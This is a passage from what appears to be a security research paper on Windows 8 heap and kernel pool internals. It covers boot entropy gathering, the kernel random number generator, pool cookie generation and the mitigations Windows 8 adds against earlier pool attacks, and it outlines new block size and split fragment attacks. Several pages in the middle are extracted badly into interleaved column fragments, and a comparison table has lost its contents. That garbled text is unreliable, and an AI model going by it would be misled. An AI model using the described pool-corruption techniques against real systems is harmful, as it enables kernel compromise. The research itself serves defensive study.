are processed  by functions  in the winload!OslpEntropySourceGatherFunctions  table, and are as 
follows. 
 OslpGatherSeedFileEntropy  
Gathers entropy by looking up the value of the “Seed” registry key (REG_BINARY)  in 
70 | Windows  8 Heap Internals 
 HKEY_LOCAL_MACHINE\SYSTEM\RNG.  This key is 76 bytes in size, whereas the last 64 bytes 
hold a unique hash used to seed the CryptoAPI  PRNG. 
 OslpGatherExternalEntropy  
Gathers entropy by looking up the value of the “ExternalEntropyCount”  registry key 
(REG_DWORD)  in HKEY_LOCAL_MACHINE\SYSTEM\RNG,  indicating  the number of external 
entropy sources (such as the TPM). It then uses this value (commonly  2 or 3) to compute a 
SHA512 hash (64 bytes) in order to produce the actual entropy. 
 OslpGatherTpmEntropy  
In addition to offering facilities for securely generating  and storing cryptographic  keys, the 
Trusted Platform Module (TPM) also features its own (true) random number generator  (TRNG). 
The TPM random number generator  consists of a state machine that mixes unpredictable  data 
with the output of a one‐way hash function.  If a TPM is present in the system, 
winload!OslpGatherTpmEntropy  calls winload!TpmApiGetRandom  to produce 40 bytes of 
random data. 
 OslpGatherTimeEntropy  
Queries several performance  counters in order to produce 56 bytes of semi‐random data. This 
includes the performance  counter (winload!BlArchGetP erformanceCounter ), a time 
performance  frequency  counter (winload!BlTimeQueryPerformanceCounter ), the current time 
(winload!BlGetTime ), as well as the current relative time (winload!BlTimeGetRelativeTimeEx ). 
 OslpGatherAcpiOem0Entropy  
Calls winload!BlUtlGetAcpiTable  to query the OEM0 ACPI table and retrieve 64 bytes of data. 
 OslpGatherRdrandEntropy  
Intel Ivy Bridge CPUs expose a new pseudo random number generator  via the RDRAND 
instruction.  Winload!OslpGatherRdRandEntropy  checks if the CPU supports this feature and 
allocates 0x6000 bytes of memory. It then fills this buffer by calling RDRAND repeatedly,  
generating  a random 32‐bit value each time. Finally, the function calls winload!SymCryptSha512  
to generate a SHA512 hash (64 bytes) of the buffer, which it uses as the final entropy. 
Before querying each of these functions,  winload!OslGatherEntropy  initializes  a separate buffer to keep 
track of the information  retrieved.  We describe this buffer using the following  BOOT_ENTROPY  data 
structure.  
typedef struct _BOOT_ENTROPY  { 
  DWORD EntropyCount;  
  DWORD Unknown;  
  ENTROPY_INFO  EntropyInfo[7];  
  CHAR BootRngData[0x430];    // offset 0x2E0h 
} BOOT_ENTROPY;  
 
  
71 | Windows  8 Heap Internals 
 The BOOT_ENTROPY  structure defines the number of entropy sources (EntropyCount ) as well as 
information  on each of the queried source (including  whether status information  indicating  if the 
request was successful),  using a separate ENTROPY_INFO  buffer. We describe this specific structure as 
follows. 
typedef struct _ENTROPY_INFO  { 
  DWORD Id; 
  DWORD Unknown2;  
  DWORD Unknown3;  
  DWORD Unknown4;  
  DWORD Code;     // supplementary  to Status 
  DWORD Result; 
  UINT64  TicksElapsed;    // ticks it took to query to entropy function 
  DWORD Length; 
  CHAR Data[0x40];    // entropy source data 
  DWORD Unknown7;  
} ENTROPY_INFO;  
 
When gathering  the entropy, Winload processes  each source in a loop by passing the ENTROPY_INFO  
buffer to a function in the winload!OslpEntropySourceGatherFunctions  table. We depict this process in 
the following  pseudo code. 
#define  ENTROPY_FUNCTION_COUNT  6 
 
UINT64 tickcount;  
 
RtlZeroMemory(  EntropySource,  sizeof(  BOOT_ENTROPY  ) ); 
 
EntropySource ‐>EntropyCount  = 7 
 
// the mismatch  between  EntropyCount  and ENTROPY_FUNCTION_COUNT  is 
// intentional  as the last entry is reserved  (not used) 
for ( i = 0; i < ENTROPY_FUNCTION_COUNT;  i++ ) 
{ 
     tickcount  = BlArchGetPerformanceCounter();  
 
     ( OslpEntropySourceGatherFunctions[i]  )( HiveIndex,  &EntropySource ‐>EntropyInfo[i]  ); 
 
     EntropySource ‐>TicksElapsed  = BlArchGetPerformanceCounter()  ‐ tickcount;  
} 
 
The first argument  passed to the entropy source gather functions  defines the index to the system hive 
table entry in the HiveTable  initialized  by Winload (see winload!OslpLoadSystemHive ). It is used to look 
up various keys in the registry, used by various gather functions  in generating  entropy. One such 
example can be seen in winload!OslpGatherExternalEntropy . This function looks up the 
“ExternalEntropyCount”  registry key (REG_DWORD)  in \\HKEY_LOCAL_MACHINE\SYSTEM\RNG  and uses 
it to compute a SHA512 hash (64 bytes) to generate the actual entropy. 
72 | Windows  8 Heap Internals 
 NTSTATUS  
OslpGatherExternalEntropy(  DWORD HiveIndex  , ENTROPY_INFO  * EntropyInfo  ) 
{ 
     NTSTATUS  Status;  
     DWORD Code, Type; 
     PVOID Root, SubKey;  
     CHAR Buf[256];  
 
     Code = 2; 
 
     EntropyInfo ‐>Id = 2; 
     EntropyInfo ‐>Unknown3  = 0; 
     EntropyInfo ‐>Unknown4  = 0; 
 
     Root = OslGetRootCell(  HiveIndex  ); 
     
     Status = OslGetSubkey(  HiveIndex,  &SubKey,  Root, L"RNG" ); 
 
     if ( NT_SUCCESS(  Status ) ) 
     { 
         Length = 256; 
         
         // retrieve  the value of the ExternalEntropyCount  registry  key 
         Status = OslGetValue(  HiveIndex,   
                               SubKey,   
                               L"ExternalEntropyCount",   
                               &Type,  
                               &Length,   
                               &Buf ); 
 
         if ( NT_SUCCESS(  Status ) ) 
         { 
             // generate  a sha512 hash of the registry  key value 
             SymCryptSha512(  &Buf, &EntropyInfo ‐>Data[0],  Length ); 
             
             EntropyInfo ‐>Length  = 0x40; 
 
             Status = STATUS_SUCCESS;  
 
             Code = 4; 
         } 
     
     } 
 
     EntropyInfo ‐>Code = Code; 
     EntropyInfo ‐>Result  = Status;  
 
     return Status;  
} 
 
Once having queried all functions  for the needed entropy, winload!OslGatherEntropy  proceeds to 
create a SHA512 hash of all the data chunks held by the processed  ENTROPY_INFO  structures.  This hash 
is again used to seed an internal AES‐based random number generator  (used by Winload specifically)  
73 | Windows  8 Heap Internals 
 which is subsequently  used to generate 0x430 bytes of random data (BootRngData ). This data 
constitutes  the actual boot entropy, later referenced  by ntoskrnl through the loader parameter  block. 
CHAR Hash[64];  
NTSTATUS  Status;  
 
Status = STATUS_SUCCESSFUL;  
 
SymCryptSha512Init(  &ShaInit  ); 
 
for ( i = 0; i < 7; i++ ) 
{ 
     SymCryptSha512Append(  &EntropySource ‐>EntropyInfo[i].Data[0],   
                           &ShaInit,   
                           EntropySource ‐>EntropyInfo[i].Length  ); 
} 
 
// generate  a sha512 hash of the collected  entropy  
SymCryptSha512Result(  &ShaInit,  &Hash ); 
 
if ( SymCryptRngAesInstantiate(  &RngAesInit,  &Hash ) ) 
{ 
     Status = STATUS_UNSUCCESSFUL;  
} 
else 
{ 
     SymCryptRngAesGenerate(  0x10, &RngAesInit,  &Stack ); 
     SymCryptRngAesGenerate(  0x30, &RngAesInit,  &EntropySource ‐>BootRngData[0]  ); 
     SymCryptRngAesGenerate(  0x400, &RngAesInit,  &EntropySource ‐>BootRngData[0x30]  ); 
     SymCryptRngAesUninstantiate(  &RngAesInit  ); 
} 
 
// clear the hash from memory 
for ( i = 0; i < 64; i++ ) 
{ 
     Hash[i]  = 0; 
} 
 
return Status;  
 
When Winload calls ntoskrnl on boot, it passes it the loader parameter  block data structure 
(nt!_LOADER_PARAMETER_BLOCK ) containing  the boot entropy as well as all the information  necessary  
to initialize the kernel. This includes the system and boot partition paths, a pointer to a table describing  
the physical memory of the system, a pointer to the in‐memory HARDWARE  and SOFTWARE  registry 
hives and so on. 
The kernel performs  initialization  in a two‐phase process, phase 0 and phase 1. During phase 0, it 
creates rudimentary  structures  that allow phase 1 to be invoked and initializes  each processor,  as well as 
internal lists and other data structures  that CPUs share. Before completing  the phase 0 initialization  
routines for the executive  (nt!ExpSystemInitPhase0 ), the kernel calls nt!ExpRngInitializeSystem  to 
initialize its own random number generator.  
74 | Windows  8 Heap Internals 
 Random 	Number	Generator 	
The pseudo random number generator  exposed by the Windows  8 kernel is based on the Lagged 
Fibonacci  Generator  (LFG) and is seeded by the entropy information  provided in the loader parameter  
block (nt!KeLoaderBlock ). It is not only used in the process of generating  the pool cookie, but also for a 
variety of other purposes such as for image base randomization,  heap encoding,  top‐down/bottom ‐up 
allocation  randomization,  PEB randomization,  and stack cookie generation.   
The random number generator  is initialized  (nt!ExpRngInitializeSystem ) by first populating  
nt!ExpLFGRngState  with the boot entropy gathered by Winload. As the RNG does not use all the 
provided entropy, it also copies unused data into nt!ExpRemainingLeftoverBootRngData . After this, the 
function proceeds to generate the first random value (part of the kernel GS cookie) by calling 
nt!ExGenRandom . This function permutes  the LFG RNG state using an additive LFG algorithm  with 
parameters  j=24 and k=55, and returns a 32‐bit value. The kernel may also request to use the leftover 
boot RNG data (if there is any remaining)  for returning  random values directly by passing ExGenRandom  
a one (1) as its first arguments.  
Pool	Cookie	Generation 	
In order to generate the pool cookie (nt!ExpPoolQuotaCookie ), the kernel makes use of its random 
number generator  as well as a number of other variables to further improve its randomness.  The cookie 
is defined upon initializing  the first non‐paged kernel pool, in nt!InitializePool  (called by 
nt!MmInitNucleus ), which is part of the phase 0 kernel initialization  process. This function first calls 
nt!KeQuerySystemTime  to retrieve the current system time as a LARGE_INTEGER , after which it gets 
the current tick count through the RDTSC instruction.  These values (time split into two 32‐bit values) 
then become XOR’ed together,  and are furthermore  XOR’ed with both KeSystemCalls  and 
InterruptTime  from the processor  control block (nt!_KPRCB ). KeSystemCalls  is a counter holding the 
current number of invoked system calls while InterruptTime  is the time spent servicing interrupts.  
Finally, these XOR’ed values become XOR’ed once more with a pseudo random value returned by 
nt!ExGenRandom . In the reasonably  unlikely event that the final value should be 0, the pool cookie is 
set to 1. Otherwise,  the final value is used as the pool cookie. 
ULONG_PTR  Value; 
KPRCB * Prcb = KeGetCurrentPrcb(  ); 
LARGE_INTEGER  Time; 
 
KeQuerySystemTime(  &Time ); 
 
Value = __rdtsc()  ^           // tick count 
  Prcb‐>KeSystemCalls  ^   // number of system calls 
  Prcb‐>InterruptTime  ^   // interrupt  time 
  Time.HighPart  ^         // current  system time 
  Time.LowPart  ^ 
  ExGenRandom(0);    // pseudo random number 
 
ExpPoolQuotaCookie  = (Value)  ? Value : 1; 
 Attack	M
In this sec
Windows  
attacks w
mitigated
Process	P
A driver o
process b
allocatio n
number o
allocatio n
ProcessB i
Upon free
This is per
quota blo
including 
value acco
Because W
attacker c
kernel me
structure 
the decre
pointer im
Note that
pointer he
Windows  
pointer is 
Mitigatio n
ction we show
7 kernel poo
ere perform e
 by the chan g
Pointer	Enc
or system com
y calling nt!E
n with a proc e
of bytes requ e
n. On x64, the
illed pointer. 
eing a quota c
rformed by lo
ck (nt!_EPR O
a value defin
ording to the 
Windows 7 an
could overwr i
emory. Speci f
(e.g. created
ment occurs .
mmediately  fo
t on x64, the a
eld by the po
8 addresses  t
first XOR’ed 
ns	
w how Wind o
ol (Mandt 201
ed in Windo w
ges introduc e
coding	
mponent may
xAllocatePo o
ess by storin g
ested by four 
e process poin
charged alloc
ooking up the
OCESS_QUOT A
ing the amo u
size of the po
nd former ope
ite it using a m
fically, the att
 in user‐mod e
. Moreover,  o
ollows the po
attacker must
ol header. 
the process p
with the poo
ows 8 addres s
11). In each of
ws 7 (and prio
ed in Windo w
 request poo
olWithQuota T
g a pointer to 
in order to st
nter is stored
ation, the po
e process obje
A_BLOCK ). Th
unt of quota u
ool allocatio n
erating syste m
memory corru
tacker could s
e) in order to
on x86 there i
ol data. The d
t overflow int
pointer attac k
l cookie (nt!E
ses the vario u
f the below su
r versions of 
ws 8. 
l allocations  t
Tag.  Interna l
the process o
tore the proc
in the last eig
ol allocator re
ect pointer an
his opaque st
used. When a
n. 
m versions do
uption vulne r
set the proce s
o control the a
s no need to 
diagram belo
to the next al
k by XOR enco
ExpPoolQuot a
us attacks pre
ubsections,  w
Windows)  an
to be quota c
lly, the pool a
object. On x8
cess pointer in
ght bytes of t
eturns the qu
nd by locatin g
tructure hold s
a free occurs, 
o not protec t
rability in ord
ss pointer to 
address of th
corrupt adjac
w illustrates  t
llocation in o
oding the pro
aCookie ), fol
75 | Windo wesented previ
we briefly det
nd then show
charged again
allocator asso
6, the kernel 
n the last fou
the pool head
uota to the as
g the pointer 
s the actual q
the allocato r
t the process 
der to decre m
a fake proce s
e quota block
cent allocati o
this attack on
rder to reach
ocess pointer 
lowed by the
ws 8 Heap Inteously on the 
ail how these
 how they are
nst the curre n
ociates a pool
increases  the
r bytes of the
der as the 
ssociated pro
to the associ
quota inform a
r decrements
pointer, an 
ment arbitrar y
ss object data
k structure w
ons, as the pr
n x86 system s
 the Process B
itself. The pr
e address of th
ernals e 
e 
nt 
 
e 
e pool 
cess. 
ated 
ation 
 this 
y 
a 
here 
ocess 
s. 
Billed 
 
ocess 
he 

 affected p
the kern e
validates 
Lookasi d
Due to th
performs  
they can b
in adding 
no easy w
attacks an
In Windo w
freed poo
could the
allocator 
to contro
pointer ov
Rather th
a random
cookie an
Although 
chunk alw
free list. A
pool allocatio
el uses the po
it by making 
de	Cookie	
e abundant  u
well. Becaus e
benefit from 
(push) and re
way of verifyi n
nd is part of t
ws 7 and form
ol chunk on a 
n force subs e
services the p
l the content s
verwrite into 
an getting rid
ized value, de
d XOR encod
the pool hea
ways reserves
As the LIST_E N
n (at the beg
ol cookie and
sure it point s
use of the ker
e lookaside  li
highly optim i
emoving (pop
ng the integri t
he reason wh
mer operatin g
lookaside  list
equent alloca t
pointer to me
s of the mem
a more usefu
d of lookasid e
erived from t
ing it with th
der is alread y
 space for the
NTRY structu
inning of the 
d pool addres
s into kernel a
nel pool, look
sts are singly
ized CPU instr
p) elements  fr
ty of a singly‐
hy these lists 
g systems, an
t in order to c
tions (e.g. by 
emory contro
ory used by t
ul exploitatio n
e lists altoget h
he kernel poo
e address of t
y full (on 32‐b
e LIST_ENTR Y
re contains tw
pool header )
s to decode t
address spac e
kside lists pla
‐linked and d
ructions such
rom a list. Ho
‐linked list. Th
are mostly ab
 attacker cou
control addre
creating obje
lled by the at
the kernel, he
n primitive su
her, Window s
ol cookie. Thi
the affected p
bit) and rema
Y structure,  u
wo pointers, 
). When a quo
the stored po
e (above nt!M
y a key role in
do not requir e
h as the atom
owever, unlik e
his has histor
bandoned in 
uld overwrite  
ss of the next
ects of the sa
ttacker. This w
ence could be
uch as an arb
s 8 protects e
is value is com
pool chunk (f
ins unchang e
sed to chain 
whereas elem
76 | Windo wota charged a
ointer, and su
MmSystemR a
n making sure
e locking of th
ic compare a
e doubly‐linke
ically lead to 
user‐mode. 
the next poin
t free pool ch
me size) unti
would then a
e used to exte
itrary kernel 
each lookasid
mputed by ta
from the poo
ed on Windo w
elements  on 
ments on the
ws 8 Heap Inteallocation is f
bsequently  
angeStart ). 
e the kernel p
he pool desc r
nd exchange  
ed lists, there
a number of 
nter held by a
hunk. The atta
l the pool 
llow the attac
end the looka
memory writ
e list pointer 
king the pool
l header). 
ws 8, each po
a doubly link
 singly linked
ernals reed, 
 
pool 
riptor, 
used 
e is 
a 
acker 
cker 
aside 
te. 
using 
l 
ool 
ked 
 

 lookaside
pointer. O
pointer is 
Pool cook
the same 
However ,
pool page
nt!ExAllo c
Cache	Al
In order t
pool alloc
documen t
compone
NonPage d
address is
size of the
Cache alig
that requ e
that a frag
bother wi
inserting a
The use o
enough sp
aligned po
masks aw
 list only cont
On x64, the co
not in use w
kies are also u
way as looka
 it should be 
e lookaside  lis
cateFromNP a
igned	Alloc a
o improve pe
cations can be
tation states 
nt or third‐pa
dPoolCache A
s found by rou
e cache line. T
gned allocati o
est 0x40 byte
gment of the 
ith returning  
a cookie in fro
of the cache a
pace is availa
ool allocatio n
way the Cach e
tain one, the 
ookie is store
hen an alloc a
used to prote c
aside lists upo
noted that no
sts as well as 
agedLookasi d
ation	Cooki e
erformance  an
e requested  t
that cache al
arty driver can
Aligned . Whe n
unding the nu
The CPU cach
ons greatly fa
es of cache ali
requested  si
the unused b
ont of the cac
ligned alloca t
ble in front o
n and the retu
eAligned pool
cookie can be
d in place of t
ation is alrea d
ct entries on 
on processing
ot all singly‐li
dedicated (ta
deList and nt!
e	
nd reduce the
o be aligned 
igned pool al
n request the
n requested,  
umber of byte
he line size is 
vor perform a
igned memo r
ze is found on
bytes, Windo w
che aligned a
tion cookie de
f the pool fra
urned chunk i
l type (4) from
e stored direc
the ProcessB
dy free. 
the pending f
 the pending 
nked lists are
ask specific) lo
!ExAllocateF r
e number of c
on processo r
locations are
em by choosi n
the pool alloc
es requested  
defined in nt
ance over spa
ry typically en
n a cache alig
ws 8 attempt s
llocation.  
epends on th
agment used. 
s already on 
m the pool he
ctly in front o
Billed pointer 
frees list, and
frees list (see
e protected  b
ookside lists s
romPagedLo o
cache lines hi
r cache boun d
e for internal 
ng a CacheAl i
cator ensure s
 up to the ne
!ExpCacheLi n
ace usage. As 
nd up allocati
gned bounda r
s to mitigate 
he address ret
If a system c
a cache align
eader of the a
77 | Windo wof the lookasi
in the pool h
d these cooki e
e nt!ExDefer r
y cookies. Th
such as thos e
okasideList . 
it during a me
daries. Altho u
use only, any
igned pool ty
s that a suita b
arest cache li
neSize and is 
an example, 
ing 0xC0 byte
ry. As the allo
exploitation  
turned by the
omponent  re
ed boundary
affected alloc
ws 8 Heap Intede list next 
eader, as this
es are valida t
redFreePool )
is includes th
e that use 
emory opera t
ugh the MSD N
y kernel 
ype (4) such a
ble cache alig
ine size, plus 
typically 64 b
32‐bit syste m
es to make su
ocator does n
attempts by 
e free lists and
equests a cach
, the allocat o
ation and ret
ernals s 
 
ted in 
. 
he 
tion, 
N 
s 
gned 
the 
bytes. 
ms 
re 
ot 
d if 
he 
or 
turns 

 immedia t
However ,
aligned bo
pool type
cookie. Th
used (cac
Thus, the 
aligned al
Safe	(Un)
Safe unlin
LIST_ENT
backwar d
situation w
known as 
was not p
Entry Flin
linking ch
Windows  
and unlin
both the d
effectivel y
(held by t
consisten
chunk tha
tely. Althoug h
 if an unalign
oundary. In th
if the skippe
his cookie is s
he aligned) ch
free algorith
location cook
)linking	
nking was intr
RY structure s
d pointers hel
where an atta
a “write‐4” (
perfect. Speci f
k attack prese
unks into a lis
8 significant l
king. Notabl y
descriptor LIS
y neutralizes  
he pool desc r
cy before link
an the size req
h the allocat o
ed chunk is r
his particular  
d fragment  o
stored in a sep
hunk with the
m checks for 
kie needs to b
roduced in th
s used by dou
d by the struc
acker contro l
or “write‐8” o
fically, safe u
ented in (Ma
st. 
y improves  li
y, when alloc a
ST_ENTRY as 
the Window s
riptor) wasn’ t
king in unuse d
quested is ret
r increases  th
eturned, the 
case, the ret
f bytes is larg
parate pool c
e pool cooki e
the CacheAl i
be verified. 
e Windows  7
ubly linked list
cture, unlinki
led value was
on x64). How
nlinking could
ndt)) and the
nked list valid
ating memor y
well as well a
s 7 attack on 
t properly val
d fragments  o
turned by a li
he requested  
allocator adj
urned cache 
ge enough (m
chunk and com
 generated  b
igned pool ty
 kernel pool t
ts. If an attac
ng the chun k
s written to a
wever, the link
d be circumv e
e kernel pool a
dation over W
y, the pool all
as the one he
safe unlinkin g
lidated. The W
of pool mem o
nked list. 
size, it leave s
usts the addr
aligned chun
more than a si
mputed by XO
y the kernel (
pe in order to
to address at
ker was able 
k from a linke
an attacker co
ked list valida
ented in spec
also did not p
Windows 7 an
locator valid a
ld by the chu
g in which th
Windows 8 po
ory, commo n
78 | Windo ws the exceed i
ress up to the
k retains the 
ngle block siz
OR encoding 
(nt!ExpPool Q
o determine  w
tacks (Kortc h
to corrupt th
d list would r
ontrolled loca
ation perfor m
cific situation s
perform any v
nd performs  b
ates both the 
unk to be alloc
e Flink in the 
ool allocator 
nly encounte r
ws 8 Heap Inteing bytes unu
e nearest cach
CacheAlign e
ze) to hold a 
the address o
QuotaCookie )
whether a ca
 
hinsky) on 
he forward an
result in a 
ation, comm o
med by Windo
s (see the List
validation wh
both safe link
Flink and Blin
cated. This 
head of a list
also checks li
red when a la
ernals used. 
he 
ed 
of the 
). 
che 
nd 
only 
ws 7 
t 
hen 
ing 
nk of 
t 
st 
rger 
 The reaso
validated  
(Ionescu)  
KiRaiseS e
LIST_ENTlinked list
the nece
s
FORCEINL
VOID 
RtlpChec
     _In_ 
     ) 
{ 
     if (
     { 
        
         
     } 
} 
 
PoolInd e
Upon free
the pool h
is used as
themselv e
nt!ExpN o
on for the imp
twice is beca
that is recog
ecurityCheck F
RY macros in 
 before any o
ssary checks a
INE 
kListEntry(  
PLIST_ENTR Y
(((Entry ‐>F
FatalListEn t
   (PVOID)
   (PVOID)
   (PVOID)
ex	Validatio
eing a pool al
header to det
 an array inde
es) which in t
nPagedPool D
proved linked
ause the Wind
nized in assem
Failure . As lon
Windows  8 a
operation take
are introduce
Y Entry 
link)‐>Blin
tryError(  
(Entry),  
((Entry ‐>Fl
((Entry ‐>Bl
n	
location, the 
termine to wh
ex into a poo
the most com
Descriptor if t
 list validatio
dows 8 kerne
mbly by the n
ng as NO_KE R
automaticall y
es place. This
d upon comp
k) != Entry
ink)‐>Blink
ink)‐>Flink
free algorith m
hich pool des
l descriptor  a
mmon case wi
there are mo
n and also wh
l pool makes 
new int29h in
RNEL_LIST_E N
y add the line 
s makes list va
pilation. 
) || (((Ent
), 
)); 
m uses the po
criptor the al
array (holdin g
ll either be nt
re than 1 non
hy there are c
use of a new
nterrupt hand
NTRY_CHEC K
RtlpCheckLi s
alidation tran
ry‐>Blink) ‐
ool type as w
llocation shou
g pointers to t
t!ExpPagedP o
n‐paged pool s
79 | Windo wcases where p
w type of secu
dler, calling 
KS remain und
stEntry(Entry )
nsparent to th
‐>Flink)  != 
well as the poo
uld be return
the pool desc
oolDescript o
s defined.  
ws 8 Heap Inte 
pointers are 
urity assertio n
defined, 
);  to verify th
he program m
Entry))  
ol index defin
ed. The pool 
criptor struct u
or or 
ernals n 
e 
mer as 
ned in 
index 
ures 
 As Wind o
referenc e
descripto
set the po
to derefe r
the null‐p
which the
not really
manage m
Windows  
pool inde x
paged poo
(nt!ExpN u
linked fre
Windows  
process), 
Summa r
In summ a
operatin g
unprotec t
the exten
enhance m
Release P
ws 7 doesn’t 
e an out‐of‐bo
r array typic a
ool index of a 
rence the nul
page an attac k
e freed chun k
managed  by
ment structur e
8 addresses  t
x is validated
ol allocation s
umberOfPag e
e lists by com
8 prevents u
hence mitiga
ry	
ary, the Wind
g system, both
ted to date, g
sive validati o
ments and mit
review. 
validate the 
ounds entry in
ally holds 4 po
pool chunk t
ll pointer imm
ker could fully
 is returned.  
the system, t
es post explo i
the pool inde
 to ensure th
s, the allocat o
edPools ). The
mparing it to t
ser applicati o
tes the PoolI
ows 8 kernel 
h in terms of 
generic attac k
on performed
tigations intr
pool index up
n the pool de
ointers, the at
to 5. Upon fre
mediately follo
y control the 
Furthermore ,
there are no 
itation. 
ex attack usin
at it is within
or checks if th
e pool index is
the index use
ons from map
ndex attack in
pool addres s
robustness  a
ks on pool me
 by the pool a
oduced in the
pon looking u
scriptor poin t
ttacker could
eeing the affe
owing the po
pool descrip t
, as the attac
issues conce r
g a very simp
 bounds of th
he pool index 
s also verifie d
d to retrieve 
pping the null
n multiple wa
ses the short c
nd security. A
etadata have 
allocator. The
e last iteratio
up the pool de
ter array. For
 use a mem o
ected allocati o
ool descripto r
tor data struc
ker operates 
rning conten t
ple fix. When e
he associated
is less than t
d upon block 
the pool desc
l page (as lon
ays. 
comings iden t
Although the 
become cons
e following  ta
ns of Windo w
80 | Windo wescriptor, an 
r instance, as 
ory corruptio n
on, this woul d
r pointers. He
cture (includi
on a pool de
tion nor need
ever a pool ch
 pool descri p
he number of
allocation  fro
criptor initial
g process is n
tified in prior
pool header 
siderably mor
able summari
ws, up until th
ws 8 Heap Inteattacker coul
the paged po
n vulnerabilit y
d cause the k
ence, by map p
ng its free list
scriptor whic
d for cleaning
hunk is freed ,
ptor array. For
f paged pool s
om the doubl
ly. Moreover ,
not a VDM 
r versions of t
remains 
re difficult du
zes the secu r
he Windows  8
ernals ld 
ool 
y to 
kernel 
ping 
ts) to 
ch is 
 up 
 
, its 
r 
s 
y 
, 
the 
ue to 
rity 
8 

81 | Windows  8 Heap Internals 
  
Primitive   Windows  Vista  Windows  7  Windows  8 (RP) 
Safe Unlinking      
Safe Linking     
Pool Cookie     
Lookaside  Chunks      
Lookaside  Pages       
Pending Frees List      
Cache Aligned 
Allocations       
PoolIndex  Validation      
Pointer Encoding      
NX Non‐Paged Pool     
  
  	
82 | Windows  8 Heap Internals 
 Block	Size	Attacks	
Although the Windows  8 kernel pool addresses  the attacks presented  previously,  it does not prevent an 
attacker from manipulating  fields in the pool header using a pool corruption  vulnerability.  While the 
extensive  validation  performed  by Windows  8 goes a long way, some fields can be hard to validate 
properly due to their lack of dependencies.  This is especially  true in the case of determining  a chunk’s 
size, as the pool allocator relies completely  on the size information  held by the pool header. In this 
section, we describe two attacks on block size values where an attacker may extend a limited (both in 
length and data written) corruption  into an n‐byte arbitrary data corruption.  
Block	Size	Attack	
As mentioned  in the initial discussion,  the pool header of a pool chunk holds two size values, the block 
size (BlockSize ) and the previous size (PreviousSize ). These fields are used by the allocator to determine  
the size of a given pool chunk, as well as for locating adjacently  positioned  pool chunks. The block size 
values are also used to perform rudimentary  validation  upon free. Specifically,  ExFreePoolWithTag  
checks if the block size of the freed chunk matches the previous size of the chunk following  it. The 
exception  to this rule is when the freed chunk fills the rest of the page, as chunks at the start of a page 
always have their previous size set to null (there are no cross‐page relationships  for small allocations  
and therefore  no guarantee  that the next page is in use). 
When a pool chunk is freed, it is put on a free list or lookaside  list based on its block size. Thus, given a 
pool corruption  vulnerability,  an attacker can overwrite  the block size in order to place it in an arbitrary 
free list. At this point, there are two scenarios  to consider. The attacker could set the block size to a 
value smaller than the original value. However,  this would be of little use as it would not extend the 
corruption,  and creating an embedded  pool header would have little or no benefit due to the pool 
header checks present. On the other hand, if the attacker sets the block size to a larger value, the 
corruption  could be extended  into adjacent pool chunks. Although the allocator performs the 
BlockSize /PreviousSize  check on free, setting the block size to fill the rest of the page of the page avoids 
the check altogether.  The attacker could then reallocate  the freed allocation  using a string or some 
other controllable  allocation  in order to fully control the contents of the bordering  pool chunk(s). 
 As there i
chunks, it
encoding 
approach  
attack, as
the attac k
one of the
fragment  
order to o
Split	Fra
When req
cannot be
chunk ret
back to th
chunk ret
the front 
the alloc a
middle), t
the alloc a
In the pro
checking.  
Flink and 
ensure it 
an attack e
s no simple w
 appears to b
on the block 
similar to tha
well as any a
ker’s ability to
e challenging  
of a pool pag
obtain a reaso
gment	Attac
questing a poo
e used,  the a
urned is large
he free lists. T
urned, whic h
of the chunk 
ator. If, on the
the end of the
ator. 
ocess of retrie
The allocato
Blink of the h
is from the ex
er could use a
way for the al
be somewhat  
size informa t
at used by the
attack dealin g
o sufficiently  
aspects of th
ge. This esse n
onable proba
ck	
ol chunk (not
llocator scan s
er than requ e
The part of th
h is designed t
is returned to
e other hand,
e chunk is ret
eving a pool c
r validates bo
head of the fr
xpected pool 
a memory co
locator to ver
difficult to ad
tion or by gro
e low fragm e
g with targeti
manipulate  a
his attack is to
ntially requir e
bility of succe
t larger than 4
s the doubly l
ested, the allo
e chunk that 
to reduce frag
o the caller w
 the chunk is 
urned to the 
chunk from a 
oth the Flink a
ee list. It also
descriptor.  H
rruption vuln
rify the block 
ddress block s
ouping alloca t
entation heap
ng pool alloc a
and control th
o find the blo
es the attack e
eeding. 
4080 bytes or
linked free lis
ocator splits t
is split (fron t
gmentation.  
while the rema
not at the be
caller while t
doubly linke d
and Blink of t
o validates the
However, bec
erability to tr
k size other th
size attacks w
tions of the sa
p (Valasek).  Th
ations in a sp
he state of th
ck size value 
er to selectiv e
r 4064 bytes o
sts until a suit
the chunk and
t or back) dep
If the chunk i
aining part of
eginning of a 
the front of th
d free list, the
he chunk to b
e pool index f
ause there’s 
rigger a block
83 | Windo w 
han looking at
without using
ame size toge
he practicalit y
ecific state, a
e kernel pool
needed to fil
ely allocate an
on x64) and l
table chunk is
d returns the 
pends on the 
s at the begin
f the chunk is
page (say, so
he chunk is re
ere’s a good a
be allocated,  
for the alloc a
no validatio n
k split when in
ws 8 Heap Intet the surroun
 some form o
ether in a 
y of the block
also depends 
l. For instanc e
l the remaini
nd free data i
ookaside lists
s found. If the
unused fragm
locality of the
nning of a pag
s returned ba
ome place in t
eturned back
amount of san
as well as the
ated chunk to
n on the block
n fact the 
ernals ding 
of 
k size 
on 
e, 
ng 
n 
s 
e 
ment 
e 
ge, 
ck to 
the 
 to 
nity 
e 
 
k size, 
 allocated 
returned 
In the abo
across mu
vulnerabi
double its
splits the 
the rema i
in use, he
memory i
The bene f
chunk pos
headers a
the objec t
collateral  
 
block is of th
back to the a
ove example, 
ultiple pages. 
lity, the attac
s size. Upon r
allocation  on
ining part bac
nce have cre
n order to ga
fit from an at
sitioning is les
are updated c
t manager if a
damage (suc
e requested  s
llocator, henc
the attacker 
By selectivel y
cker could ove
equesting  thi
nce returned b
ck to the free
ated a use‐af
ain full contr o
ttacker’s pers
ss of an issue
correctly. How
a kernel obje
ch as double f
	
size. If the blo
ce the attack
has sprayed 
y freeing som
erwrite the b
is memory us
by the free lis
lists. At this p
fter‐free like s
ol of the affec t
pective of the
e as the splitti
wever, becau s
ct was target
frees) unless p
ock size is set
er can poten t
allocations  of
me of these al
lock size of a 
sing somethi n
st, and retur n
point, the allo
situation whe
ted object. 
e split fragm e
ng process m
se the kernel 
ed) in creati n
precautionar y
t to a larger v
tially free frag
f the same siz
locations and
free chunk a
ng controllabl
ns the top par
ocator have f
ere the attac k
ent attack ove
makes sure tha
still referen c
ng the split fra
y steps are ta
84 | Windo walue, the rem
gments of in 
ze (e.g. exec u
d triggering  a 
t the start of 
e like a strin g
rt of the chun
freed a chun k
ker can reallo
er the block s
at the affect e
ces the mem o
agment, ther
aken.	
ws 8 Heap Intemaining bytes 
use‐memory
utive objects) 
pool corrup t
a page and 
